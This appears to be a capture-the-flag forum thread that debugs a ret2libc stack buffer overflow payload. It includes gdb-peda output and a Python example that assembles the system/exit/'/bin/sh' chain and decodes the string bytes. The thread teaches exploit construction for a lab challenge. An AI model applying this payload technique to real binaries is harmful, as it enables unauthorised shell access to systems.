App - System ELF Stack buffer overflow basic 6
Hello guys, I'm getting a weird error. I'm able to spawn a shell and everything is ok, but when I try to spawn a shell in the terminal environment it shows up a weird Python error; now I don't know where I can find help for this.
screenshot gdb: https://prnt.sc/gcm4vm
Thanks in advance ;)
I might be wrong, but what you're doing looks like a ret2libc attack, in which case:
> The payload ends with something like @system | @addr | @"/bin/sh" (and NOT the other way around !)
> So that, with the right offset, the program jumps to system after a ret thinking "/bin/sh" is its argument, and then jumps back to @addr when done.
In your case, the program called system(GIBBERISH) (where GIBBERISH is the string starting at @exit), which calls /bin/dash as any system() call does, but to no effect (wrong shell command), and then proceeds to jump to the address of "/bin/sh":
gdb-peda$ find "/bin/sh"
Searching for '/bin/sh' in: None ranges
Found 1 results, display max 1 items:
libc : 0xb7f84cec ("/bin/sh")
gdb-peda$ x/10i 0xb7f84cec
0xb7f84cec: das
0xb7f84ced: bound ebp,QWORD PTR [ecx+0x6e]
0xb7f84cf0: das
0xb7f84cf1: jae 0xb7f84d5b
0xb7f84cf3: add BYTE PTR [ebp+0x78],ah
0xb7f84cf6: imul esi,DWORD PTR [eax+eiz*1+0x30],0x6e616300
0xb7f84cfe: outs dx,DWORD PTR ds:[esi]
0xb7f84cff: outs dx,BYTE PTR ds:[esi]
0xb7f84d00: imul esp,DWORD PTR [ebx+0x61],0x657a696c
0xb7f84d07: arpl WORD PTR cs:[eax],ax
which will lead to "random behavior" and especially to an outs ... instruction, which is forbidden in user mode (hence the SIGILL).
TL;DR: swap the address of /bin/sh and exit in your payload. It's a common ret2libc mistake 😉
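To make the argument above concrete, here is an added Python example (mine, not the poster's and not part of the challenge) that models the two things the answer describes: what a cdecl callee sees once the overwritten saved EIP has been popped by `ret`, and why the bytes of the "/bin/sh" string disassemble to `das`, `bound` and `jae` when execution lands on them. The address of "/bin/sh" (0xb7f84cec) is taken from the gdb-peda output in the thread; the @system and @exit values are placeholders, and the three-opcode decoder only covers the opcodes that happen to occur in the string.

```python
import struct

# Placeholders: the thread does not show the real libc addresses of system/exit.
SYSTEM_ADDR = 0xB7E3B000   # placeholder @system
EXIT_ADDR = 0xB7E2F000     # placeholder @exit
BINSH_ADDR = 0xB7F84CEC    # "/bin/sh" address from the gdb-peda 'find' output above

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]


def build_chain(*words):
    """Pack 32-bit little-endian words the way they sit on the stack,
    starting at the overwritten saved EIP slot."""
    return b"".join(struct.pack("<I", w) for w in words)


def callee_view(payload):
    """After `ret` pops the first word into EIP, ESP points at the second word.
    A cdecl callee treats [ESP] as its return address and [ESP+4] as arg0."""
    eip, ret_to, arg0 = struct.unpack("<III", payload[:12])
    return {"eip": eip, "return_to": ret_to, "arg0": arg0}


def diagnose(payload):
    """Describe what system() ends up doing for a given word order."""
    v = callee_view(payload)
    if v["eip"] != SYSTEM_ADDR:
        return "does not reach system"
    if v["arg0"] == BINSH_ADDR:
        return "system(\"/bin/sh\"), then returns to exit"
    # Swapped order: the argument is whatever bytes live at @exit (gibberish
    # command), and the return lands inside the "/bin/sh" string itself.
    return (f"system(<bytes at {v['arg0']:#x}>), "
            f"then returns into \"/bin/sh\" at {v['return_to']:#x}")


def decode_string_bytes(data, base):
    """Minimal x86-32 decoder for the opcodes found in '/bin/sh':
    0x2f ('/') das, 0x62 ('b') bound r32,m with [reg+disp8], 0x73 ('s') jae rel8.
    Decoding stops at the first byte it does not know."""
    out, i = [], 0
    while i < len(data):
        op, addr = data[i], base + i
        if op == 0x2F:
            out.append((addr, "das"))
            i += 1
        elif op == 0x62 and i + 2 < len(data):
            modrm = data[i + 1]
            mod, reg, rm = modrm >> 6, (modrm >> 3) & 7, modrm & 7
            if mod != 1 or rm == 4:        # only the [reg+disp8] form is needed here
                break
            disp = data[i + 2]
            out.append((addr, f"bound {REG32[reg]},QWORD PTR [{REG32[rm]}+{disp:#x}]"))
            i += 3
        elif op == 0x73 and i + 1 < len(data):
            rel = data[i + 1]
            rel = rel - 256 if rel > 127 else rel
            out.append((addr, f"jae {addr + 2 + rel:#x}"))   # target is relative to next insn
            i += 2
        else:
            break
    return out


if __name__ == "__main__":
    good = build_chain(SYSTEM_ADDR, EXIT_ADDR, BINSH_ADDR)
    bad = build_chain(SYSTEM_ADDR, BINSH_ADDR, EXIT_ADDR)
    print("correct order:", diagnose(good))
    print("swapped order:", diagnose(bad))
    for addr, insn in decode_string_bytes(b"/bin/sh", BINSH_ADDR):
        print(f"{addr:#x}: {insn}")
```

Running the decoder on the seven string bytes reproduces the first four lines of the `x/10i 0xb7f84cec` listing in the thread, including the `jae 0xb7f84d5b` target (0xb7f84cf1 + 2 + 0x68), which is the quickest way to convince yourself that the "instructions" gdb shows are just the characters of "/bin/sh" being executed.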